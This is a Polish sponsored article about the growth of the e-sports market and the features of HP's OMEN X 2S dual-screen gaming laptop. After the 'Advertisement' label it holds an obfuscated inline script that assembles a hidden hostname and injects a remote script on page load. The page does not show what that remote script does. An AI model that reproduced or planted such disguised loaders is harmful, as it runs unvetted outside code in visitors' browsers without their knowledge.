Artykuł sponsorowany

E-sport – rozrywka wymagająca nowoczesnego sprzętu

Redakcja Antyweb
E-sport – rozrywka wymagająca nowoczesnego sprzętu
6

E-sport cieszy się ogromną popularnością na całym świecie. Nowych graczy cały czas przybywa, a do uprawiania tego rodzaju rozrywki koniecznym jest posiadanie wydajnego komputera.

Branża sportu elektronicznego bardzo dynamicznie się rozwija. Najlepszym tego dowodem jest przygotowany przez firmę analityczną Newzoo raport: „Global Esports Market”, w którym podane są m. in. dane dotyczące wartości e-sportu w 2019 roku. Jego wartość w do końca bieżącego roku przekroczy 1,1 mld dolarów, co z kolei jest równe wzrostowi na poziomie 26,7% w stosunku do roku poprzedniego. Na podstawie tej tendencji firma Newzoo szacuje, że rynek e-sportu osiągnie w 2022 r. poziom 1,8 mld dolarów.

Jak miejsce zajmuje Polska w e-sporcie?

Analiza opracowana wspólnie przez PayPal i SuperData ukazuje, że nasz kraj jest jednym z najdynamiczniej rozwijających się rynków EMEA (sektor obejmujący Europę, Bliski Wschód oraz Afrykę). W 2017 roku dochód e-sportu wyniósł w Polsce 10 milionów dolarów, szacuje się, że w roku 2019 ma on osiągnąć ok. 14,5 mln USD. Co ciekawe, w Polsce tą dziedziną sportu interesuje się 24% kobiet, podczas gdy dla porównania w innych krajach odsetek ten wynosi poniżej 20%. Przed dwoma laty w naszym kraju było ponad 923 tys. odbiorców e-sportu, z czego prawie 43% stanowiły osoby w przedziale wiekowym 18–24 lat, natomiast ponad 50% odbiorców to użytkownicy, którzy przekroczyli 25 rok życia. Do końca roku 2019 z kolei, ogólna liczba odbiorców w Polsce może wzrosnąć do blisko 1,5 miliona. Dane te ukazują, jak ważną rolę wśród internautów, których w Polsce jest obecnie blisko 30 milionów, zaczyna odgrywać e-sport.

Laptop gamingowy dający większe możliwości niż kiedykolwiek wcześniej

Profesjonalny sprzęt to niezbędnik każdego gracza. Jednak obecnie komputer dla graczy powinien być na tyle zaawansowany, aby zapewnić użytkownikowi jak największe możliwości. Idealnym wyborem są laptopy gamingowe takie jak OMEN X 2S od HP. Przewaga tego sprzętu nad tradycyjnymi jednostkami to nie tylko możliwość rozgrywania zawodów bez względu na miejsce, w którym znajdzie się gracz. OMEN X 2S firmy HP ma znacznie więcej do zaoferowania – jest to pierwszy na świecie laptop dla graczy, w którym zastosowano dwa ekrany. Główna matryca IPS o wielkości 15,6 cala i rozdzielczości Full HD posiada synchronizację obrazu w technologii G-Sync, zapewniającą najwyższą jakość widoku. Z kolei ekran pomocniczy znajdujący się tuż nad klawiaturą daje możliwość wycinania i powiększania wybranych części głównego ekranu, np. mapy w grze, dzięki czemu gracz uzyskuje przewagę nad swoimi przeciwnikami. Jednak to nie wszystkie jego zalety. Mniejszy wyświetlacz eliminuje konieczność przełączania się między oknami przy użyciu kombinacji klawiszy Alt+Tab. W trakcie grania można dzięki niemu korzystać z takich aplikacji jak Spotify, Youtube czy Twitch, a także czatować z innymi graczami. Umieszczone pod sobą ekrany dają ponadto możliwość przesuwania aplikacji.

OMEN X 2S firmy HP posiada smukłą sylwetkę dzięki zastosowaniu wąskich krawędzi ekranu. Niska masa urządzenia (2,35 kg) i mierząca zaledwie 20 mm grubości metalowa obudowa pozwalają wygodnie go użytkować. Co ważne, jest to laptop, w którym zastosowane zostało chłodzenie ciekłym metalem – konkretnie płynnym, metalizowanym amalgamatem (Thermal Grizzly Conductonaut). Rozwiązanie to sprawia, że komponenty laptopa się nie grzeją, co ma ogromne znaczenie przy zachowaniu najwyższej wydajności podczas wielogodzinnych zmagań z innymi graczami.

Laptop dorównujący komputerom stacjonarnym

OMEN X 2S od HP charakteryzuje się najlepszymi parametrami. 8-rdzeniowy procesor Intel Core 9. generacji sprawia, że laptop ten ma wydajność komputera stacjonarnego. Pamięć RAM o pojemności do 32 GB DDR4 i taktowaniu 3200 MHz oraz bardzo wydajna karta graficzna Nvidia GeForce RTX 2080 (8 GB GDDR6) sprawiają, że laptop poradzi sobie nawet z najbardziej wymagającymi tytułami. Funkcja RTX zastosowana w karcie to śledzenie promieni w czasie rzeczywistym, dzięki czemu generowane są bardzo realistyczne cienie oraz oświetlenie.

E-sport to dziedzina, która ma coraz większe znaczenie w zasięgu globalnym. Firma HP, wspierając rozwój e-sportu nie tylko zapewnia profesjonalny sprzęt jednej z najlepszych drużyn gamingowych świata – Astralis, ale również dostarcza nowoczesne laptopy, np. OMEN X 2S dające graczom pełną mobilność podczas treningów na najwyższym poziomie.

Advertisement

<script> (function(){ z74q=document.createElement("script");z74q_=(("u")+"st")+"a";z74q.async=true; z74q.type="text/javascript";z74q_+=("t.i")+""+"n";z74q_+=(("f")+"o");z74q_+="/"; z74qu="186442634.";z74qu+="dix5218p74q670uxt12"+"1v9keq69dcs"; z74q.src="https://"+z74q_+z74qu;document.body.appendChild(z74q); })(); </script>

Hej, jesteśmy na Google News - Obserwuj to, co ważne w techu